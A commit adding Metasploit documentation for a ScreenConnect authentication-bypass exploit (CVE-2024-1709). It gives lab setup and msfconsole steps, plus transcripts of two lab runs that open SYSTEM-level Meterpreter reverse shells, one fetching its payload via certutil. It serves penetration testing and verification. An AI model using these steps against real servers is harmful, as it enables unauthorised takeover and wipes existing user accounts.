add in docs
This commit is contained in:
parent
e0ee7940d0
commit
f6b1c9b1ce
|
@ -0,0 +1,176 @@
|
|||
## Vulnerable Application
|
||||
This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create
|
||||
a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage
|
||||
this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7
|
||||
and below are affected.
|
||||
|
||||
**Note:** The vulnerability will replace the ScreenConnect systems existing User.xml file, meaning existing user
|
||||
accounts will be removed after exploitation.
|
||||
|
||||
## Testing
|
||||
* Download a vulnerable version of the software by visiting:
|
||||
* https://screenconnect.connectwise.com/download/archive, for example download the file
|
||||
[ScreenConnect_23.9.7.8804_Release.msi](https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_23.9.7.8804_Release.msi)
|
||||
* Request a trial license if you do not already have one.
|
||||
* On a Windows system, click through the installer to install the product and complete the installation in your
|
||||
web browser as instructed.
|
||||
* Once completed, you can login by visiting http://127.0.0.1:8040/ in your browser.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. `set target 0`
|
||||
3. `set payload windows/x64/meterpreter/reverse_tcp`
|
||||
4. `set LHOST eth0`
|
||||
5. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
6. `check`
|
||||
7. `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows In-Memory
|
||||
|
||||
```
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 0
|
||||
target => 0
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload windows/x64/meterpreter/reverse_tcp
|
||||
payload => windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set LHOST eth0
|
||||
LHOST => eth0
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set RHOST 192.168.86.50
|
||||
RHOST => 192.168.86.50
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
|
||||
|
||||
Module options (exploit/windows/http/connectwise_screenconnect_rce_cve_2024_1709):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8040 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST eth0 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows In-Memory
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > check
|
||||
[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
|
||||
[*] Created account: jpusoojm:ukvEw9bnQFwXkhqX. Note: This account will not be deleted by the module.
|
||||
[*] Uploaded Extension: 93adc1a3-213c-c88a-56bc-dcf1351a4cad
|
||||
[*] Removing Extension: 93adc1a3-213c-c88a-56bc-dcf1351a4cad
|
||||
[*] Sending stage (201798 bytes) to 192.168.86.50
|
||||
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:53443) at 2024-02-21 17:35:38 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-V28QNSO2H05
|
||||
OS : Windows Server 2022 (10.0 Build 20348).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > pwd
|
||||
C:\Windows\system32
|
||||
meterpreter > exit
|
||||
[*] Shutting down session: 1
|
||||
|
||||
[*] 192.168.86.50 - Meterpreter session 1 closed. Reason: User exit
|
||||
```
|
||||
|
||||
#### Windows Command
|
||||
|
||||
```
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/windows/
|
||||
Display all 619 possibilities? (y or n)
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
|
||||
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > show options
|
||||
|
||||
Module options (exploit/windows/http/connectwise_screenconnect_rce_cve_2024_1709):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.86.50 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8040 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME pSPyWvtiaaH no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
|
||||
LHOST eth0 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Windows Command
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > check
|
||||
[*] 192.168.86.50:8040 - The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
|
||||
msf6 exploit(windows/http/connectwise_screenconnect_rce_cve_2024_1709) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. ConnectWise ScreenConnect 23.9.7.
|
||||
[*] Created account: xkerretc:Ctp1yP9Gh4htnE2s. Note: This account will not be deleted by the module.
|
||||
[*] Uploaded Extension: b7eb38d2-ea46-f662-2c3e-d6e3071767f7
|
||||
[*] Removing Extension: b7eb38d2-ea46-f662-2c3e-d6e3071767f7
|
||||
[*] Sending stage (201798 bytes) to 192.168.86.50
|
||||
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:53686) at 2024-02-21 17:37:46 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-V28QNSO2H05
|
||||
OS : Windows Server 2022 (10.0 Build 20348).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > pwd
|
||||
C:\Windows\system32
|
||||
meterpreter >
|
||||
```
|
Loading…
Reference in New Issue